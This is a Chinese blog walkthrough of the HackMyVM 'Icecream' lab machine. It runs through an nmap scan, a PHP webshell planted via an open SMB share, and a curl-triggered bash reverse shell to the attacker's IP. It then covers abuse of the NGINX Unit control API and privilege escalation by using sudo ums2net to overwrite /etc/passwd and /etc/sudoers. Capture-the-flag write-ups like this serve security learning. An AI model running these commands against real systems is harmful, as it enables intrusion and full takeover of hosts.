HMV Icecream - Zsm's blog

hmv_Icecream#

靶场链接#

https://hackmyvm.eu/machines/machine.php?vm=Icecream

日常扫描#

1
└─$ nmap -sV -sC -T4 -Pn -p- 192.168.64.22
2
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 16:05 HKT
3
Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
4
Service scan Timing: About 60.00% done; ETC: 16:06 (0:00:07 remaining)
5
Nmap scan report for 192.168.64.22
6
Host is up (0.00048s latency).
7
Not shown: 65530 closed tcp ports (reset)
8
PORT     STATE SERVICE     VERSION
9
22/tcp   open  ssh         OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
10
| ssh-hostkey:
11
|   256 68:94:ca:2f:f7:62:45:56:a4:67:84:59:1b:fe:e9:bc (ECDSA)
12
|_  256 3b:79:1a:21:81:af:75:c2:c1:2e:4e:f5:a3:9c:c9:e3 (ED25519)
13
80/tcp   open  http        nginx 1.22.1
14
|_http-title: 403 Forbidden
15
|_http-server-header: nginx/1.22.1
16
139/tcp  open  netbios-ssn Samba smbd 4.6.2
17
445/tcp  open  netbios-ssn Samba smbd 4.6.2
18
9000/tcp open  cslistener?
19
| fingerprint-strings:
20
|   FourOhFourRequest:
21
|     HTTP/1.1 404 Not Found
22
|     Server: Unit/1.33.0
23
|     Date: Mon, 10 Feb 2025 08:05:55 GMT
24
|     Content-Type: application/json
25
|     Content-Length: 40
26
|     Connection: close
27
|     "error": "Value doesn't exist."
28
|   GetRequest:
29
|     HTTP/1.1 200 OK
30
|     Server: Unit/1.33.0
31
|     Date: Mon, 10 Feb 2025 08:05:55 GMT
32
|     Content-Type: application/json
33
|     Content-Length: 1042
34
|     Connection: close
35
|     "certificates": {},
36
|     "js_modules": {},
37
|     "config": {
38
|     "listeners": {},
39
|     "routes": [],
40
|     "applications": {}
41
|     "status": {
42
|     "modules": {
43
|     "python": {
44
|     "version": "3.11.2",
45
|     "lib": "/usr/lib/unit/modules/python3.11.unit.so"
46
|     "php": {
47
|     "version": "8.2.18",
48
|     "lib": "/usr/lib/unit/modules/php.unit.so"
49
|     "perl": {
50
|     "version": "5.36.0",
51
|     "lib": "/usr/lib/unit/modules/perl.unit.so"
52
|     "ruby": {
53
|     "version": "3.1.2",
54
|     "lib": "/usr/lib/unit/modules/ruby.unit.so"
55
|     "java": {
56
|     "version": "17.0.11",
57
|     "lib": "/usr/lib/unit/modules/java17.unit.so"
58
|     "wasm": {
59
|     "version": "0.1",
60
|     "lib": "/usr/lib/unit/modules/wasm.unit.so"
61
|   HTTPOptions:
62
|     HTTP/1.1 405 Method Not Allowed
63
|     Server: Unit/1.33.0
64
|     Date: Mon, 10 Feb 2025 08:05:55 GMT
65
|     Content-Type: application/json
66
|     Content-Length: 35
67
|     Connection: close
68
|_    "error": "Invalid method."
69
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
70
SF-Port9000-TCP:V=7.94SVN%I=7%D=2/10%Time=67A9B363%P=aarch64-unknown-linux
71
SF:-gnu%r(GetRequest,4A8,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Unit/1\.33\
72
SF:.0\r\nDate:\x20Mon,\x2010\x20Feb\x202025\x2008:05:55\x20GMT\r\nContent-
73
SF:Type:\x20application/json\r\nContent-Length:\x201042\r\nConnection:\x20
74
SF:close\r\n\r\n{\r\n\t\"certificates\":\x20{},\r\n\t\"js_modules\":\x20{}
75
SF:,\r\n\t\"config\":\x20{\r\n\t\t\"listeners\":\x20{},\r\n\t\t\"routes\":
76
SF:\x20\[\],\r\n\t\t\"applications\":\x20{}\r\n\t},\r\n\r\n\t\"status\":\x
77
SF:20{\r\n\t\t\"modules\":\x20{\r\n\t\t\t\"python\":\x20{\r\n\t\t\t\t\"ver
78
SF:sion\":\x20\"3\.11\.2\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib/unit/modules
79
SF:/python3\.11\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t\t\"php\":\x20{\r\n\t\t
80
SF:\t\t\"version\":\x20\"8\.2\.18\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib/uni
81
SF:t/modules/php\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t\t\"perl\":\x20{\r\n\t
82
SF:\t\t\t\"version\":\x20\"5\.36\.0\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib/u
83
SF:nit/modules/perl\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t\t\"ruby\":\x20{\r\
84
SF:n\t\t\t\t\"version\":\x20\"3\.1\.2\",\r\n\t\t\t\t\"lib\":\x20\"/usr/lib
85
SF:/unit/modules/ruby\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t\t\"java\":\x20{\
86
SF:r\n\t\t\t\t\"version\":\x20\"17\.0\.11\",\r\n\t\t\t\t\"lib\":\x20\"/usr
87
SF:/lib/unit/modules/java17\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t\t\"wasm\":
88
SF:\x20{\r\n\t\t\t\t\"version\":\x20\"0\.1\",\r\n\t\t\t\t\"lib\":\x20\"/us
89
SF:r/lib/unit/modules/wasm\.unit\.so\"\r\n\t\t\t},\r\n\r\n\t\t")%r(HTTPOpt
90
SF:ions,C7,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nServer:\x20Uni
91
SF:t/1\.33\.0\r\nDate:\x20Mon,\x2010\x20Feb\x202025\x2008:05:55\x20GMT\r\n
92
SF:Content-Type:\x20application/json\r\nContent-Length:\x2035\r\nConnectio
93
SF:n:\x20close\r\n\r\n{\r\n\t\"error\":\x20\"Invalid\x20method\.\"\r\n}\r\
94
SF:n")%r(FourOhFourRequest,C3,"HTTP/1\.1\x20404\x20Not\x20Found\r\nServer:
95
SF:\x20Unit/1\.33\.0\r\nDate:\x20Mon,\x2010\x20Feb\x202025\x2008:05:55\x20
96
SF:GMT\r\nContent-Type:\x20application/json\r\nContent-Length:\x2040\r\nCo
97
SF:nnection:\x20close\r\n\r\n{\r\n\t\"error\":\x20\"Value\x20doesn't\x20ex
98
SF:ist\.\"\r\n}\r\n");
99
MAC Address: EE:67:54:A9:FD:C8 (Unknown)
100
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
101

102
Host script results:
103
|_nbstat: NetBIOS name: ICECREAM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
104
| smb2-time:
105
|   date: 2025-02-10T08:05:55
106
|_  start_date: N/A
107
| smb2-security-mode:
108
|   3:1:1:
109
|_    Message signing enabled but not required
110

111
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
112
Nmap done: 1 IP address (1 host up) scanned in 14.77 seconds

反弹shell#

看看smb服务

1
┌──(kali㉿kali)-[~]
2
└─$ smbclient -L 192.168.64.22
3
Password for [WORKGROUP\kali]:
4

5
        Sharename       Type      Comment
6
        ---------       ----      -------
7
        print$          Disk      Printer Drivers
8
        icecream        Disk      tmp Folder
9
        IPC$            IPC       IPC Service (Samba 4.17.12-Debian)
10
        nobody          Disk      Home Directories
11
Reconnecting with SMB1 for workgroup listing.
12
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
13
Protocol negotiation to server 192.168.64.22 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
14
Unable to connect with SMB1 -- no workgroup available

发现用户icecream 直接往共享目录里面塞一句话木马

curl一下看看效果

1
    ┌──(kali㉿kali)-[~]
2
    └─$ curl "http://192.168.64.22/shell.php?cmd=id"
3
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
4
    弹shell(记得url编码一下)
5
    curl "http://192.168.64.22/shell.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.64.3%2F4444%200%3E%261%22"

本地监听一下，

1
www-data@icecream:/tmp$ cat /etc/passwd
2
cat /etc/passwd
3
root:x:0:0:root:/root:/bin/bash
4
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
5
bin:x:2:2:bin:/bin:/usr/sbin/nologin
6
sys:x:3:3:sys:/dev:/usr/sbin/nologin
7
sync:x:4:65534:sync:/bin:/bin/sync
8
games:x:5:60:games:/usr/games:/usr/sbin/nologin
9
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
10
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
11
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
12
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
13
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
14
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
15
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
16
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
17
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
18
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
19
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
20
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
21
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
22
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
23
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
24
avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
25
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
26
ice:x:1000:1000:ice,,,:/home/ice:/bin/bash
27
unit:x:999:995:unit user:/nonexistent:/bin/false

好像没有用，sudo -l也没有，思路断了，想起来nmap的时候还有其他的端口 9000端口返回

1
certificates  {}
2
js_modules  {}
3
config
4
listeners  {}
5
routes  []
6
applications  {}
7
status
8
modules
9
python
10
version  "3.11.2"
11
lib  "/usr/lib/unit/modules/python3.11.unit.so"
12
php
13
version  "8.2.18"
14
lib  "/usr/lib/unit/modules/php.unit.so"
15
perl
16
version  "5.36.0"
17
lib  "/usr/lib/unit/modules/perl.unit.so"
18
ruby
19
version  "3.1.2"
20
lib  "/usr/lib/unit/modules/ruby.unit.so"
21
java
22
version  "17.0.11"
23
lib  "/usr/lib/unit/modules/java17.unit.so"
24
wasm
25
version  "0.1"
26
lib  "/usr/lib/unit/modules/wasm.unit.so"
27
wasm-wasi-component
28
version  "0.1"
29
lib  "/usr/lib/unit/modules/wasm_wasi_component.unit.so"
30
connections
31
accepted  0
32
active  0
33
idle  0
34
closed  0
35
requests
36
total  0
37
applications  {}

gpt跟我说这是NGINX Unit的输出，https://unit.nginx.org/controlapi/ 这是这个服务的官网，查后台进程，这个服务是ice的，那么就是通过这个提权到ice了

gpt直接告诉我payload了（）

1
PUT /config/applications HTTP/1.1
2
Host: 192.168.64.22:9000
3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
4
Accept-Encoding: gzip, deflate
5
Content-Type: application/json
6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
7
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
8
DNT: 1
9
x-real-ip: Papa
10
Content-Length: 73
11

12
{ "blogs": { "type": "php", "processes": 20, "root": "/tmp/shell.php" } }
13

14
本地写一个config.json
15
{
16
  "listeners": {
17
    "*:8088": {
18
      "application": "blogs"
19
    }
20
  },
21
  "applications": {
22
    "blogs": {
23
      "type": "php",
24
      "processes": 20,
25
      "root": "/tmp"
26
    }
27
  }
28
}
29

30
然后
31
curl -X PUT -d @config.json http://192.168.64.22:9000/config
32
{
33
        "success": "Reconfiguration done."
34
}
35

36
然后访问8088/shell.php  并且反弹shell

这个时候就是ice了（原理我慢慢研究），现在是最喜欢的提权阶段

提权#

1
ice@icecream:/tmp$ sudo -l
2
sudo -l
3
Matching Defaults entries for ice on icecream:
4
    env_reset, mail_badpass,
5
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
6
    use_pty
7

8
User ice may run the following commands on icecream:
9
    (ALL) NOPASSWD: /usr/sbin/ums2net

ums2net的github页面是这样描述的

1
ums2net provides a way for a user to connect from a network connection to a USB mass storage device.
2

3
How to use ums2net
4

5
Insert the USB Mass Storage. Check /dev/disk/by-id/ for the unique path for that device.
6
Create a config file base on the above path. Please see the config file format section.
7
Run "ums2net -c ". ums2net will become a daemon in the background. For debugging please add "-d" option to avoid detach.
8
Use nc to write your image to the USB Mass Storage device. For example, "nc -N localhost 29543 < warp7.img"

所以我们可以用ums2net -c来提权，首先我们要写一个配置文件，既然他可以守护进程，我们就可以利用端口去写入。

第一种方法，把root密码覆盖为无

1
本地
2
┌──(kali㉿kali)-[~]
3
└─$ echo "root::0:0:root:/root:/usr/bin/bash" > tmp
4

5
nc 192.168.64.22 23456 < tmp
6

7
远程
8
ice@icecream:/tmp$ echo "23456 of=/etc/passwd" > config
9
echo "23456 of=/etc/passwd" > config
10
ice@icecream:/tmp$ sudo /usr/sbin/ums2net -c config -d
11
sudo /usr/sbin/ums2net -c config -d
12
/etc/sudoers:2:11: error de sintaxis
13
 with the 'visudo' command as root.
14
          ^~~~~~~~
15

16
ums2net[1282]: Totally write 35 bytes to /etc/passwd
17

18
ice@icecream:/tmp$ su
19
su
20
id
21
uid=0(root) gid=0(root) grupos=0(root)

方法二覆盖sudoers文件（至于为什么是这个文件，一些佬是直接用的，一些是试出来的）我感觉主要是因为当用户执行sudo时，系统会主动寻找/etc/sudoers文件，判断该用户是否有执行sudo的权限 –>确认用户具有可执行sudo的权限后，让用户输入用户自己的密码确认 –>若密码输入成功，则开始执行sudo后续的命令

1
远程
2
echo "8889 of=/etc/sudoers" > config
3
sudo /usr/sbin/ums2net -c config -d
4

5
本地
6
echo 'ice ALL=(ALL) NOPASSWD: ALL'|nc 192.168.64.22 8889
7

8
远程
9
su

a ctfer on the load

hmv_Icecream#

靶场链接#

日常扫描#

反弹shell#

提权#